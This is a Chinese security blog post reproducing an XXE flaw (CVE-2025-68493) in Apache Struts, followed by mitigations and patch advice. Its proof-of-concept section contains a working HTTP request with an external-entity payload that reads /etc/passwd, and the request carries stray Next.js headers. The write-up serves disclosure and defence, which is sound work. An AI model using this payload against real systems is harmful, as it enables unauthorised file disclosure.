文章总结： ApacheStruts2.0.0-2.3.37、2.5.0-2.5.33、6.0.0-6.1.0因缺失XML验证存在XXE漏洞CVE-2025-68493，攻击者可通过构造multipart请求读取任意文件；文章给出完整POC、回显验证与临时缓解方案，包括自定义SAXParserFactory、JVM禁用外部实体、WAF规则及最小权限隔离，建议立即升级至官方补丁版本。 综合评分： 88 文章分类： 漏洞分析,WEB安全,漏洞POC,安全工具,应急响应

【成功复现】Apache Struts XML外部实体注入漏洞(CVE-2025-68493)

原创

弥天安全实验室

弥天安全实验室

2026年1月15日 09:40 陕西

网安引领时代，弥天点亮未来

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

Apache Struts是美国阿帕奇（Apache）基金会的一个开源项目，是一套用于创建企业级Java Web应用的开源MVC框架，主要提供两个版本框架产品，Struts 1和Struts 2。

Apache Struts 2.0.0版本至2.3.37版本、2.5.0版本至2.5.33版本和6.0.0 版本至6.1.0版本存在安全漏洞，该漏洞源于缺少XML验证，容易受到XML外部实体注入攻击。

0x02影响版本

2.0.0 ≤ Apache Struts ≤ 2.3.37         2.5.0 ≤ Apache Struts ≤ 2.5.33         6.0.0 ≤ Apache Struts ≤ 6.1.0

0x03漏洞复现

1.访问环境

2.漏洞复线

POC

POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/2Host: 127.0.0.1Next-Action: xX-Nextjs-Request-Id: e9myfwgxContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3SadX-Nextjs-Html-Request-Id: uEBTJuTmVvbHxbRvCmf0mContent-Length: 104
<?xml version="1.0"?><!DOCTYPE&nbsp;root&nbsp;[<!ENTITY&nbsp;xxe&nbsp;SYSTEM&nbsp;"file:///etc/passwd">]><root>&xxe;</root>

通过回显判断漏洞利用成功

3.工具测试

0x04修复建议****

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

临时缓解方案

1、使用自定义SAXParserFactory：将xwork.saxParserFactory设置为默认禁用外部实体的自定义工厂类； 2、定义JVM级别的配置：通过系统属性配置JVM的默认XML解析器以禁用外部实体（设置为空字符串以阻止所有协议）：    -Djavax.xml.accessExternalDTD=””    -Djavax.xml.accessExternalSchema=””    -Djavax.xml.accessExternalStylesheet=””

3、在 WAF、IDS/IPS 中部署基于 POC 的检测规则，识别针对该漏洞的探测与攻击行为。

    关闭未使用的功能模块，减少潜在攻击面。

   使用最小权限原则，尽量不暴露服务到公网，限制访问源为可信范围。

    定期更新系统及各类组件至安全版本，及时修补已知隐患。

建议尽快升级修复漏洞，再次声明本文仅供学习使用，非法他用责任自负！

https://struts.apache.org/download.cgihttps://cwiki.apache.org/confluence/display/WW/S2-069

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫，

予以风动，

必降弥天之润！

弥  天

安全实验室

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：弥天安全实验室 弥天安全实验室《【成功复现】Apache Struts XML外部实体注入漏洞(CVE-2025-68493)》